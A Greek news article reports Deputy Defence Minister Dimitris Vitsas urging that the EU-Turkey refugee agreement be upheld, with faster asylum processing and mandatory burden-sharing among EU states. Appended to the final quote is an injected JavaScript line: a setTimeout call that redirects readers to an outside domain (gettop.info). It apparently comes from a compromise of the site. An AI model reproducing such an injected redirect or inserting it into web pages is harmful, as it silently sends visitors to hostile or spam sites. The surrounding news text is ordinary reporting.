Βίτσας: Η συμφωνία ΕΕ-Τουρκίας πρέπει να κρατηθεί

0
6

 

Την αναγκαιότητα να τηρηθεί η συμφωνία ΕΕ-Τουρκίας εξέφρασε ο αναπληρωτής υπουργός Εθνικής Άμυνας, Δημήτρης Βίτσας, κατά τη διάρκεια της συζήτησης της επερώτησης της ΝΔ για το προσφυγικό-μεταναστευτικό.

Ο κ. Βίτσας υπογράμμισε ότι πρέπει να επιαχυνθούν οιεργασίες της πρώτης υποδοχής, δηλαδή η εξέταση του ασύλου και των προσφυγών παρουσιάζοντας στοιχεία που δείχνουν ότι οι ροές μειώθηκαν σημαντικά μετά τη σύναψη της συμφωνίας.

«Πρέπει να λάβουμε και μία σειρά μέτρα, διότι η συμφωνία ΕΕ-Τουρκίας προέβλεπε και την ανταλλαγή Ελλήνων και Τούρκων αξιωματικών για τις επιστροφές», είπε ο υπουργός ενώ η διαδικασία που πάγωσε μετά την απόπειρα πραξικοπήματος, τώρα επανεκκινείται.

«Εμείς ως κυβέρνηση πιέζουμε να υπάρξει και ένα εναλλακτικό σχέδιο», είπε ο αναπληρωτής υπουργός που προσέθεσε ότι αυτό δεν μπορεί να είναι άλλο από ένα σχέδιο ενάντια στα κλειστά σύνορα, τις βίαιες μαζικές απελάσεις, τη λογική της Ευρώπης-φρούριο, σχέδιο που θα βασίζεται στη λογική της ισομερούς κατανομής των βαρών της προσφυγικής κρίσης ανάμεσα στα κράτη-μέλη με υποχρεωτικές αναλογικές ποσοστώσεις.

«Αυτό το σχέδιο δεν το θέλει το Ευρωπαϊκό Λαϊκό Κόμμα και συμβολή θα ήταν να πιέζετε σε αυτήν την κατεύθυνση», είπε απευθυνόμενος στη ΝΔ.

Ο κ. Βίτσας υπογράμμισε ότι στόχος της κυβέρνησης είναι να μειωθεί ο αριθμός αυτών που βρίσκονται στα 50 κέντρα φιλοξενίας και hot spots, να αυξηθεί η εγκατάσταση σε σπίτια, να ενισχυθούν οι επιστροφές και η εγκατάσταση σε άλλες χώρες της Ευρώπης.

«Υπάρχουν, όμως, χώρες που λένε ότι δεν παίρνουν κανέναν και άλλες χώρες που ενώ έπρεπε να στείλουν πέντε ανθρώπους να βοηθήσουν στο άσυλο δεν έχουν στείλει κανέναν ή χώρες που λένε θα κάνουν δημοψήφισμα. Εδώ πρέπει να βάλουμε τείχος ανθρωπιάς, αλληλεγγύης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here